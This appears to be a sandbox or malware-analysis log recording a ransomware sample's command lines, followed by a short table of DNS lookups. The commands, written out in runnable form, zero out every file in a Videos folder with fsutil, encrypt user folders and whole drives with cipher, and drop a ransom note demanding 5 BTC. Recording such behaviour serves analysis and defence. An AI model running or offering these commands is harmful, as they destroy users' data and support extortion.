C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:C:\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\
C:\Windows\system32\cmd.exe
cmd.exe /c cipher /E /A /S:D:\
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |